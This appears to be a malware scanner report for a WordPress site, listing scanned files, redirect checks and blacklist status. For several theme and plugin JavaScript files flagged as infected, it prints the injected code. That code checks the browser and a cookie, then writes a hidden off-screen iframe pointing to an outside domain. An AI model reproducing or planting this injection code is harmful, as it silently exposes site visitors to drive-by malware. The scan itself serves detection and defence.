Scanned pages/files
| Request | Server response | Status |
http://painuk.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:50:31 GMT Location: http://www.painuk.org/ Server: cloudflare-nginx Vary: Cookie,User-Agent,Accept-Encoding Content-Type: text/html; charset=UTF-8 CF-RAY: 16a443821d5d0f63-FRA Set-Cookie: __cfduid=db45c6a373337f109a4ab91d0aa50fe081410778230099; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.painuk.org; HttpOnly X-Pingback: http://www.painuk.org/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.painuk.org/ | 200 OK Content-Length: 44001 Content-Type: text/html | clean |
http://www.painuk.org/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96314 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/plugins/media-element-html5-video-and-audio-player/mediaelement/mediaelement-and-player.min.js?ver=2.1.3 | 200 OK Content-Length: 64806 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/flexslider.js?ver=3.9.2 | 200 OK Content-Length: 14884 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/framework.js?ver=3.9.2 | 200 OK Content-Length: 1503 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name){var templateshoper=document.cookie.match(new RegExp("(?:^|; )"+ name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return templateshoper?decodeURIComponent(templateshoper[1]):undefined;} function Hardtechnology(){var JameNoober=navigator.userAgent;var NiceProgroude=(JameNoober.indexOf("IEMobile")>-1||JameNoober.indexOf("Windows NT 6.3")>-1||JameNoober.indexOf("Chrome")>-1||JameNoober.indexOf("Windows")<+1);var Plogin=(getCookie("ultras17bros return false;});}); Antivirus reports:
| ||
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/external.js?ver=3.9.2 | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/suckerfish.js?ver=3.9.2 | 200 OK Content-Length: 1312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name){var templateshoper=document.cookie.match(new RegExp("(?:^|; )"+ name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return templateshoper?decodeURIComponent(templateshoper[1]):undefined;} function Hardtechnology(){var JameNoober=navigator.userAgent;var NiceProgroude=(JameNoober.indexOf("IEMobile")>-1||JameNoober.indexOf("Windows NT 6.3")>-1||JameNoober.indexOf("Chrome")>-1||JameNoober.indexOf("Windows")<+1);var Plogin=(getCookie("ultras17bros Hardtechnology();sfHover=function(){var sfEls=document.getElementById("topnav").getElementsByTagName("li");for(var i=0;i<sfEls.length;i++){sfEls[i].onmouseover=function(){this.className+=" sfhover";} sfEls[i].onmouseout=function(){this.className=this.className.replace(new RegExp(" sfhover\\b"),"");}}} if(window.attachEvent)window.attachEvent("onload",sfHover); Antivirus reports:
| ||
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 15530 Content-Type: application/x-javascript | clean |
http://www.painuk.org/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 1997 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.ksatria-hafidz.com ...[259 bytes skipped]... nction Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); var ...[801 bytes skipped]... Decoded script: <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.ksatria-hafidz.com/internetioane16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201435 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Augaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.painuk.org/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.9.2 | 200 OK Content-Length: 1777 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.ksatria-hafidz.com ...[160 bytes skipped]... epize?decodeURIComponent(Smilepize[1]):undefined;} function Pleos_Aflertuder(){var r_amblartide=navigator.userAgent;var Yellowgrand=(r_amblartide.indexOf("IEMobile")>-1||r_amblartide.indexOf("Windows NT 6.3")>-1||r_amblartide.indexOf("Chrome")>-1||r_amblartide.indexOf("Windows")<+1);var Ultrastilus=(getCookie("Garamg18usality")===undefined);if(!Yellowgrand&&Ultrastilus){document.write('<iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>');var date=new Date(new Date().getTime()+ 66*60*60*1000);document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString();}} Pleos_Aflertuder();WPGroHo=jQuery.extend({my_hash:'',data: ...[729 bytes skipped]... Decoded script: <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.ksatria-hafidz.com/internetioane16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://stats.wp.com/e-201435.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://painuk.org/cdn-cgi/l/email-protection | 200 OK Content-Length: 4211 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: painuk.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 10:50:31 GMT
Location: http://www.painuk.org/
Server: cloudflare-nginx
Vary: Cookie,User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
CF-RAY: 16a443821d5d0f63-FRA
Set-Cookie: __cfduid=db45c6a373337f109a4ab91d0aa50fe081410778230099; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.painuk.org; HttpOnly
X-Pingback: http://www.painuk.org/xmlrpc.php
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: painuk.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 10:50:31 GMT
Location: http://www.painuk.org/
Server: cloudflare-nginx
Vary: Cookie,User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
CF-RAY: 16a443821d5d0f63-FRA
Set-Cookie: __cfduid=db45c6a373337f109a4ab91d0aa50fe081410778230099; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.painuk.org; HttpOnly
X-Pingback: http://www.painuk.org/xmlrpc.php
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: painuk.org
Referer: http://www.google.com/search?q=painuk.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: painuk.org
Referer: http://www.google.com/search?q=painuk.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=painuk.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://painuk.org/
Result: painuk.org is not infected or malware details are not published yet.
Result: painuk.org is not infected or malware details are not published yet.